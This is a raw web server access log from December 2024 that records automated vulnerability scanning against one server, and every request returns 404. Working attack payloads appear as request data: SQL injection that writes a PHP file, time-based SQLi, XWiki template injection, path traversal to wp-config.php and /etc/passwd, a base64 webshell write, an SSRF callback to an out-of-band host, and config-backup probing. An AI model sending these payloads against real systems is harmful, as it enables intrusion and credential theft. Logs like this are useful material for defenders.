- 404 7 0 227 2024-12-12 15:08:17 103.153.214.94 POST /emap/devicePoint_addImgIco hasSubsystem=true 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.5.18 - 404 7 0 200 2024-12-12 15:08:18 103.153.214.94 GET /feed/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.1.1 - 404 7 0 223 2024-12-12 15:08:21 103.153.214.94 GET /author-sitemap.xml - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/112.0.0.0+Safari/537.36 - 404 7 0 218 2024-12-12 15:08:24 103.153.214.94 POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction action=image 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/90.0.4430.212+Safari/537.36 - 404 7 0 67 2024-12-12 15:08:47 103.153.214.94 GET /inc/group_user_list/group_xml.php par=W2dyb3VwXTpbMV18W2dyb3VwaWRdOlsxIHVuaW9uIHNlbGVjdCAnPD9waHAgZWNobyBtZDUoIndlYXZlci1ncm91cC14bWwtc3FsaSIpO3VubGluayhfX0ZJTEVfXyk7Pz4nLDIsMyw0LDUsNiw3LDggaW50byBvdXRmaWxlICcuLi93ZWJyb290LzliNjVmLnBocCdd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.1+Safari/605.1.15 - 404 7 0 80 2024-12-12 15:08:50 103.153.214.94 GET /9b65f.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.7.20 - 404 7 0 109 2024-12-12 15:08:53 103.153.214.94 POST /E-mobile/App/System/Login/login_quick.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.5+Safari/605.1.15 - 404 7 0 58 2024-12-12 15:09:25 103.153.214.94 POST /workrelate/plan/util/uploaderOperate.jsp - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/71.0.3578.98+Safari/537.36 - 404 7 0 65 2024-12-12 15:09:40 103.153.214.94 GET /bin/view/"]]+{{async+async="true"+cached="false"+context="doc.reference"}}{{python}}print(3724348+*+8473334){{/python}}{{/async}} sheet=SkinsCode.XWikiSkinsSheet&xpage=view 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 400 0 0 230 2024-12-12 15:09:44 103.153.214.94 GET /asyncrenderer/{{url}} clientId={{id}}&timeout=500&wiki=xwiki 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3+Safari/605.3.25 - 404 7 0 218 2024-12-12 15:10:04 103.153.214.94 GET /api/server/version - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0+Safari/605.4.21 - 404 7 0 212 2024-12-12 15:10:08 103.153.214.94 POST /api/users - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.5.1+Safari/605.1.15 - 404 7 0 210 2024-12-12 15:10:47 103.153.214.94 POST /wp-admin/admin-post.php - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+rv:109.0)+Gecko/20100101+Firefox/117.0 - 404 7 0 86 2024-12-12 15:10:49 103.153.214.94 POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 78 2024-12-12 15:10:52 103.153.214.94 GET / - 8172 - 147.185.133.192 Expanse,+a+Palo+Alto+Networks+company,+searches+across+the+global+IPv4+space+multiple+times+per+day+to+identify+customers'+presences+on+the+Internet.+If+you+would+like+to+be+excluded+from+our+scans,+please+send+IP+addresses/domains+to:+scaninfo@paloaltonetworks.com - 404 7 0 317 2024-12-12 15:10:52 103.153.214.94 GET /userportal/api/rest/contentChannels/ startIndex=0&pageSize=4&sort=TIME&showType=all 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 226 2024-12-12 15:10:54 103.153.214.94 GET /eoffice10/server/public/iWebOffice2015/Document/asfm7.php - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 63 2024-12-12 15:11:08 103.153.214.94 GET /jeecg-boot/sys/dict/loadTreeData tableName=sys_user+t&text=password,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+WebView/3.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.18362 - 404 7 0 202 2024-12-12 15:11:08 103.153.214.94 GET /jeecg-boot/sys/dict/loadTreeData tableName=sys_user&text=password%20text,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 211 2024-12-12 15:11:08 103.153.214.94 GET /sys/dict/loadTreeData tableName=sys_user&text=password%20text,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_5)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.108+Safari/537.36 - 404 7 0 217 2024-12-12 15:11:08 103.153.214.94 GET /sys/dict/loadTreeData tableName=sys_user+t&text=password,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.5)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.15 - 404 7 0 233 2024-12-12 15:11:09 103.153.214.94 GET /api/session/properties - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 218 2024-12-12 15:11:23 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 81 2024-12-12 15:11:31 103.153.214.94 GET /wp-content/uploads/p3d/2q3kZ6EwKqHDS8uu4wVObq80GdI.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.6+Safari/605.1.15 - 404 7 0 57 2024-12-12 15:13:02 103.153.214.94 GET / - 8172 - 156.251.25.152 python-requests/2.26.0 - 404 7 0 218 2024-12-12 15:13:06 103.153.214.94 POST /moveitisapi/moveitisapi.dll action=m2 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/115.0.0.0+Safari/537.36 - 404 7 0 208 2024-12-12 15:13:09 103.153.214.94 POST /guestaccess.aspx - 8172 - 156.251.25.152 python-requests/2.26.0 - 404 7 0 199 2024-12-12 15:13:31 103.153.214.94 POST /wp-admin/admin-ajax.php image_id=123 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 36 2024-12-12 15:14:29 103.153.214.94 GET /graph_view.php action=tree_content&node=1-1-tree_anchor&rfilter=%22or+%22%22%3D%22%28%28%22%29%29%3BSELECT+SLEEP%2810%29%3B--+- 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.5.18 - 404 7 0 211 2024-12-12 15:15:50 103.153.214.94 GET /inc/jquery/uploadify/uploadify.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 40 2024-12-12 15:15:56 103.153.214.94 POST /inc/jquery/uploadify/uploadify.php - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/71.0.3578.98+Safari/537.36 - 404 7 0 34 2024-12-12 15:16:00 103.153.214.94 GET /index.php m=default&c=user&a=register&u=0 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.2;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/115.0 554fcae493e564ee0dc75bdf2ebf94cabought_notes|a:1:{s:2:"id";s:49:"0&&updatexml(1,concat(0x7e,(database()),0x7e),1)#";} 404 7 0 215 2024-12-12 15:16:23 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 222 2024-12-12 15:16:29 103.153.214.94 POST /wp-content/plugins/ait-csv-import-export/admin/upload-handler.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.22 - 404 7 0 35 2024-12-12 15:16:30 103.153.214.94 GET /login.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.4.22 - 404 7 0 218 2024-12-12 15:16:37 103.153.214.94 GET /wp-content/uploads/2q3kZ4avUZNwwyJ2OGDaDSou4ed.php - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 149 2024-12-12 15:16:48 103.153.214.94 GET /login.php - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 196 2024-12-12 15:17:09 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.7.20 - 404 7 0 216 2024-12-12 15:17:59 103.153.214.94 GET /simpleeditor/common/commonReleaseNotes.do - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1.4+Safari/605.1.15 - 404 7 0 208 2024-12-12 15:18:00 103.153.214.94 POST /modules/miniform/ajax_delete_message.php - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 223 2024-12-12 15:18:03 103.153.214.94 GET /login.php - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 223 2024-12-12 15:18:35 103.153.214.94 GET /general/weibo/javascript/LazyUploadify/uploadify.php - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 59 2024-12-12 15:18:35 103.153.214.94 POST /rest/xxxxxxxxxxxxxxx/xxxxxxx executeAsync 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 224 2024-12-12 15:18:39 103.153.214.94 GET / season=1&league_id=1season=1&league_id=1'+AND+(SELECT+1909+FROM+(SELECT(SLEEP(6)))ZiBf)--+qODp&match_day=1&match_day=1&team_id=1&team_id=1 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 35 2024-12-12 15:18:41 103.153.214.94 POST /general/weibo/javascript/LazyUploadify/uploadify.php - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/71.0.3578.98+Safari/537.36 - 404 7 0 86 2024-12-12 15:21:20 103.153.214.94 GET /general/weibo/javascript/uploadify/uploadify.php - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/50.0.2661.75+Safari/537.36 - 404 7 0 36 2024-12-12 15:21:27 103.153.214.94 POST /general/weibo/javascript/uploadify/uploadify.php - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/71.0.3578.98+Safari/537.36 - 404 7 0 35 2024-12-12 15:21:32 103.153.214.94 GET /attachment/personal/_temp.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.13;+rv:71.0)+Gecko/20100101+Firefox/71.0 - 404 7 0 39 2024-12-12 15:22:32 103.153.214.94 POST /api/sys/set_passwd - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_1)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.1.153183 - 404 7 0 210 2024-12-12 15:22:43 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 217 2024-12-12 15:23:21 103.153.214.94 POST /index.php - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 206 2024-12-12 15:26:22 103.153.214.94 GET /file-manager/ - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 217 2024-12-12 15:26:25 103.153.214.94 POST /file-manager/backend/makefile - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 207 2024-12-12 15:26:28 103.153.214.94 POST /file-manager/backend/text - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/107.0.0.0+Safari/537.36 - 404 7 0 198 2024-12-12 15:26:31 103.153.214.94 POST /file-manager/backend/permissions - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.0)+AppleWebKit/618.25.8+(KHTML,+like+Gecko)+Version/17.3+Safari/618.25.8 - 404 7 0 201 2024-12-12 15:26:34 103.153.214.94 GET /Hc2wa0MDHR.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.3.18 - 404 7 0 205 2024-12-12 15:27:09 103.153.214.94 GET /mobile-app/v3/ pid='+AND+(SELECT+6398+FROM+(SELECT(SLEEP(7)))zoQK)+AND+'Zbtn'='Zbtn&isMobile=chatbot 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.19041 - 404 7 0 35 2024-12-12 15:27:30 103.153.214.94 GET /wxjsapi/saveYZJFile fileName=test&downloadUrl=file:///C:/&fileExt=txt 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.7.21 - 404 7 0 57 2024-12-12 15:27:36 103.153.214.94 GET /file/fileNoLogin/{{idname}} - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.4.22 - 404 7 0 56 2024-12-12 15:27:42 103.153.214.94 GET /wxjsapi/saveYZJFile fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:93.0)+Gecko/20100101+Firefox/93.0 - 404 7 0 56 2024-12-12 15:27:48 103.153.214.94 GET /file/fileNoLogin/{{idname}} - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_6)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/14.1.2+Safari/605.1.15 - 404 7 0 33 2024-12-12 15:29:02 103.153.214.94 GET /WebInterface - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+rv:109.0)+Gecko/20100101+Firefox/118.0 - 404 7 0 220 2024-12-12 15:29:05 103.153.214.94 GET /wp-content/plugins/wp-autosuggest/autosuggest.php wpas_action=query&wpas_keys=1%27%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F5202%2F%2A%2A%2FFROM%2F%2A%2A%2F%28SELECT%28SLEEP%286%29%29%29yRVR%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28%27dwQZ%27%2F%2A%2A%2FLIKE%2F%2A%2A%2F%27dwQZ 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:109.0)+Gecko/20100101+Firefox/118.0 - 404 7 0 32 2024-12-12 15:30:28 103.153.214.94 GET /wp-json/ - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.4.21 - 404 7 0 58 2024-12-12 15:30:35 103.153.214.94 GET /wp-json/notificationx/v1/notification/1 api_key=0afd1aba016d54f5435932c99fe44d6b&id[1]=%3d(SELECT/**/1/**/WHERE/**/SLEEP(6)) 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:88.0)+Gecko/20100101+Firefox/88.0 - 404 7 0 40 2024-12-12 15:30:39 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 34 2024-12-12 15:30:44 103.153.214.94 POST /wp-admin/admin-ajax.php +config-create+/&/<?=base64_decode($_GET[0])?>+/tmp/2q3kZ5LWpiCshtFiD0ivbEwUtj8.php 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 52 2024-12-12 15:30:50 103.153.214.94 POST /wp-admin/admin-ajax.php 0=MnEza1pCSUpSelZDN0F2aldKYzhna1laQ2pR 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/60.0.3112.113+Safari/537.36 - 404 7 0 47 2024-12-12 15:31:23 103.153.214.94 POST /models url=http%3a//ctd67t3bclspkptm3qo018wnxqs8p4qfb.oast.fun 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 244 2024-12-12 15:31:30 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 209 2024-12-12 15:31:44 103.153.214.94 GET /wp-content/plugins/google-mp3-audio-player/direct_download.php file=../../wp-config.php 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/96.0.4664.45+Safari/537.36 - 404 7 0 42 2024-12-12 15:32:23 103.153.214.94 POST /api/sys/login - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 223 2024-12-12 15:32:24 103.153.214.94 POST /geoserver/wms - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.79+Safari/537.36+Edge/14.14393 - 404 7 0 223 2024-12-12 15:32:24 103.153.214.94 POST /wms - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 221 2024-12-12 15:32:26 103.153.214.94 GET /wp-content/plugins/custom-tables/readme.txt - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.4.20 - 404 7 0 38 2024-12-12 15:32:46 103.153.214.94 GET /hoteldruid/inizio.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.4.27 - 404 7 0 222 2024-12-12 15:32:57 103.153.214.94 POST /jeecg-boot/jmreport/queryFieldBySql - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/14.1.2+Safari/605.1.15 - 404 7 0 204 2024-12-12 15:33:01 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 201 2024-12-12 15:33:15 103.153.214.94 GET /wp-config.php.txt - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 31 2024-12-12 15:33:15 103.153.214.94 GET /wp-config-sample.php - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 31 2024-12-12 15:33:15 103.153.214.94 GET /wp-config.php.orig - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/93.0.4577.0+Safari/537.36 - 404 7 0 36 2024-12-12 15:33:15 103.153.214.94 GET /wp-config.php.old - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_17)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 - 404 7 0 55 2024-12-12 15:33:15 103.153.214.94 GET /wp-config.txt - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh+Intel+Mac+OS+X+10.15+rv:91.0)+Gecko/20100101+Firefox/91.0; - 404 7 0 51 2024-12-12 15:33:15 103.153.214.94 GET /wp-config.backup - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 50 2024-12-12 15:33:15 103.153.214.94 GET /wp-config.php.SAVE - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 53 2024-12-12 15:33:15 103.153.214.94 GET /wp-config-backup.txt - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+LoiLoNote/19.0.0+Version/17.2+Safari/605.1.15 - 404 7 0 31 2024-12-12 15:33:15 103.153.214.94 GET /.wp-config.php.swp - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.1.1 - 404 7 0 31 2024-12-12 15:33:15 103.153.214.94 GET /wp-config.old - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.2;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 32 2024-12-12 15:33:15 103.153.214.94 GET /wp-config.php.original - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:12.0)+Gecko/20100101+Firefox/12.0 - 404 7 0 31 2024-12-12 15:33:15 103.153.214.94 GET /wp-config.php.html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.4+Safari/605.1.15 - 404 7 0 31 2024-12-12 15:33:15 103.153.214.94 GET /wp-config.inc - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 29 2024-12-12 15:33:15 103.153.214.94 GET /wp-config.php.BAK - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 32 2024-12-12 15:33:15 103.153.214.94 GET /wp-config.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.4.22 - 404 7 0 31 2024-12-12 15:33:15 103.153.214.94 GET /wp-config.php.dist - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 32 2024-12-12 15:33:15 103.153.214.94 GET /wp-config.php.save - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 32 2024-12-12 15:33:15 103.153.214.94 GET /_wpeprivate/config.json - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:87.0)+Gecko/20100101+Firefox/87.0 - 404 7 0 37 2024-12-12 15:33:15 103.153.214.94 GET /wp-config.php.OLD - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 37 2024-12-12 15:33:15 103.153.214.94 GET /wp-config.php_orig - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 39 2024-12-12 15:33:15 103.153.214.94 GET /wp-config.php.bak - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.6.1+Safari/605.1.15 - 404 7 0 34 2024-12-12 15:33:15 103.153.214.94 GET /wp-config.php-backup - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 34 2024-12-12 15:33:15 103.153.214.94 GET /wp-config.php.inc - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11)+AppleWebKit/616.16+(KHTML,+like+Gecko)+Version/17.0.90+Safari/616.16 - 404 7 0 56 2024-12-12 15:33:15 103.153.214.94 GET /wp-config.php~ - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 57 2024-12-12 15:33:15 103.153.214.94 GET /wp-config.php.swp - 8172 - 